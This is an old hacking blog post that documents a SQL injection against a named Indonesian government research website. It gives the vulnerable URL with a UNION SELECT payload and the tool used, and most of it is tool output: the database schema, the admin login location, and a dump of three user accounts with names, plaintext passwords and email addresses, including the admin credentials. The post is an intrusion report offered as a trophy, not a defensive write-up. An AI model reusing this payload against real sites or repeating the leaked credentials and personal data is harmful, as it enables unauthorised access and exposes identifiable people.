viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Monday, October 13, 2008

[SQLi] http://papua.litbang.deptan.go.id

5:07 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin loc --> http://papua.litbang.deptan.go.id/login.html
Admin usr:pwd --> admin:n0rm1 (see the others in dump or above pic)
Dump:
[+] URL:http://papua.litbang.deptan.go.id/detail.php?id=10+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 12:58:37
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: papua
User: papua@localhost
Version: 5.0.22-Debian_0ubuntu6.06.10-log

[Database]: papua
[Table: Columns]
[0]anggota: no,nama,password,level,email
[1]berita: no_berita,judul,penulis,tanggal,jam,kategori,isi_berita,gambar
[2]kategori: no,isi

[-] [12:58:40]
[-] Total URL Requests 17
[-] Done


[+] URL:http://papua.litbang.deptan.go.id/detail.php?id=10+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 13:00:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: papua
User: papua@localhost
Version: 5.0.22-Debian_0ubuntu6.06.10-log
[+] Dumping data from database "papua" Table "anggota"
[+] Column(s) ['nama', 'password', 'email']
[+] Number of Rows: 3

[0] admin:n0rm1:webmaster@riset-it.com:
[1] Herman Masbaitubun:dip461:liwarwartel@yahoo.com:
[2] J.Limbongan:papa:j_limbongan@yahoo.com:j_limbongan@yahoo.com:

[-] [13:00:15]
[-] Total URL Requests 5
[-] Done

0 comments:

Post a Comment